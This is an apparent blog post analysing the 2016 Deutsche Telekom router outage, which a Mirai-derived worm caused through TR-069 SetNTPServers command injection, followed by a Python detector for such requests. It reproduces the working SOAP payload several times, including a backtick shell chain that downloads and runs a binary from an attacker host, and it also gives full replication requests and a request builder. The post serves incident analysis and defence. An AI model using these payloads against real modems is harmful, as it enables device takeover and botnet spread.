Today's Telekom problems

[Update]
This is a pretty nice description and summary: https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

The malware seems to be a descendant of the Mirai Linux worm
https://www.virustotal.com/en/file/7e84a8a74e93e567a6e7f781ab5764fe3bbc12c868b89e5c5c79924d5d5742e2/analysis/

which is described here
https://en.wikipedia.org/wiki/Mirai_(malware)
or here
https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html

[/Update]

Many German Deutsche Telekom customers had connectivity problems tonight. Some people claimed that they could use their network again after changing the DNS server on their hosts. Most people got their boxes working again (for some time) after a reboot. Telekom put out a lot of misleading and conflicting information. The events are summarized here:

https://www.heise.de/newsticker/meldung/Grossstoerung-im-Telekom-Netz-3505820.html

I found some interesting facts here
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Re-15-08-2014-Millionen-DSL-Router-durch-TR-069-Fernwartung-kompromittierbar/posting-29559291/show/

From everything I saw, it seems that some attacker sends a TR-069 XML command like this:

<?xml version="1.0"?>
<SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
      <NewNTPServer2/>
      <NewNTPServer3/>
      <NewNTPServer4/>
      <NewNTPServer5/>
    </u:SetNTPServers>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

I'm still trying to find out whether this comes from inside the Telekom network or from outside. The number of access requests has been declining since tonight:
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/TR-069/posting-29558928/show/

It seems that Telekom now blocks TCP port 7547 from the outside.

The URL seems to differ a bit. The server currently has the IP 212.92.127.146. People say it used to be 188.209.49.168.
(https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz-dauert-an/Re-port-7547-scans-auf-Digitalisierungsbox/posting-29559739/show/).

Anyway, this obviously tries to inject shell commands (the backtick-quoted string in NewNTPServer1 gets evaluated by a shell on the box) via a bug first discovered here:
https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/

First of all, this changes the DNS server to some bogus value, which explains the DNS problems. (Note that the request shown above only carries the injected shell command in the NewNTPServer1 field; the DNS change is not part of the SOAP call itself.) Second, it loads a MIPS binary (SHA1:
60b0b1631b1c7112b34f6850f60fc62e95174428) into the RAM disk under /tmp and executes it. Since /tmp does not survive a restart, the show is over after a reboot unless the binary injects something permanently elsewhere. That also explains why rebooting the box helps, at least for a while.

But now, what does the binary do? I just looked at the strings output, and one thing it does is disable the TR-069 port via

iptables -A INPUT -p tcp --destination-port 7547 -j DROP

and send some status information to a receiver that is (to me) still unknown:

POST /
HTTP/1.1
Myname--is:
Host:
Cookie:
http
url=

There is at least a second version of the binary (SHA1:
feb6531b4509015a3a119f67b290175b284e9864) that additionally disables a locally running telnet daemon and seems to replicate itself via two different URLs:

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?>
<SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
      <NewNTPServer2></NewNTPServer2>
      <NewNTPServer3></NewNTPServer3>
      <NewNTPServer4></NewNTPServer4>
      <NewNTPServer5></NewNTPServer5>
    </u:SetNTPServers>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?>
<SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
      <NewNTPServer2></NewNTPServer2>
      <NewNTPServer3></NewNTPServer3>
      <NewNTPServer4></NewNTPServer4>
      <NewNTPServer5></NewNTPServer5>
    </u:SetNTPServers>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
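As an added example (this is my own code, not part of the original post and not taken from the malware): a small Python parser and detector for the requests quoted above, both the first SOAP command and the two replication requests. It splits a raw port-7547 POST into headers and body, pulls the NewNTPServerN values out of the SetNTPServers call and flags any value that is not a plain hostname or dotted-quad IP. That same check is what a hardened SetNTPServers handler would apply before the value ever reaches a shell; the backtick command fails it on its first character. The request body is reconstructed from the ones on this page (same URL and command); the benign server name pool.ntp.org is my own placeholder.

```python
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TIME_NS = "urn:dslforum-org:service:Time:1"

# What a sane SetNTPServers handler should accept: a hostname or dotted quad,
# nothing else, checked before the value gets anywhere near a shell.
NTP_SERVER_RE = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)

# Body constructed from the requests quoted on this page (same URL and command).
EXPLOIT_BODY = (
    '<?xml version="1.0"?><SOAP-ENV:Envelope '
    'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
    'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    '<SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
    '<NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>'
    '<NewNTPServer2></NewNTPServer2><NewNTPServer3></NewNTPServer3>'
    '<NewNTPServer4></NewNTPServer4><NewNTPServer5></NewNTPServer5>'
    '</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>'
)
# A legitimate call for comparison (constructed; the server name is a placeholder).
BENIGN_BODY = EXPLOIT_BODY.replace(
    "`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`", "pool.ntp.org"
)


def build_request(body: str, host: str = "127.0.0.1:7547") -> str:
    """Assemble the POST /UD/act?1 request the strings output shows, CRLF-terminated."""
    headers = [
        "POST /UD/act?1 HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers",
        "Content-Type: text/xml",
        f"Content-Length: {len(body.encode())}",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def split_http_request(raw: str):
    """Split a raw request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def ntp_server_values(body: str):
    """Return [(element name, text)] for the children of a SetNTPServers call, or [] if none."""
    root = ET.fromstring(body)
    call = root.find(f"{{{SOAP_NS}}}Body/{{{TIME_NS}}}SetNTPServers")
    if call is None:
        return []
    # The NewNTPServerN children carry no namespace prefix, so tag is the bare name.
    return [(child.tag, child.text or "") for child in call]


def classify(raw: str) -> dict:
    """Decide whether a port-7547 request is a SetNTPServers injection attempt.

    Only SetNTPServers calls are inspected; any non-empty value that is not a
    plain hostname/IP is reported as injected."""
    _, headers, body = split_http_request(raw)
    if "#SetNTPServers" not in headers.get("soapaction", ""):
        return {"verdict": "other", "injected": []}
    injected = [
        (tag, value)
        for tag, value in ntp_server_values(body)
        if value and not NTP_SERVER_RE.match(value)
    ]
    return {"verdict": "exploit" if injected else "benign", "injected": injected}


def injected_commands(raw: str):
    """The shell commands an attacker tried to smuggle in, with the backticks stripped."""
    return [value.strip("`") for _, value in classify(raw)["injected"]]


if __name__ == "__main__":
    for name, body in (("exploit", EXPLOIT_BODY), ("benign", BENIGN_BODY)):
        req = build_request(body)
        print(name, classify(req)["verdict"], injected_commands(req))
```

Running the script prints "exploit" for the worm's request together with the extracted wget/chmod/execute chain, and "benign" for the same call with a real server name. Feeding it captured port-7547 traffic is the quickest way to tell probes apart from legitimate TR-064 traffic from the provisioning side.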

In one forum it was said that Telekom tries to use the same bug to inject an iptables command that closes the TR-069 port and hopes to be faster than the attackers. I'm still trying to get confirmation about this :).

https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Misfortune-Cookie-neuaufgelegt/posting-29560638/show/
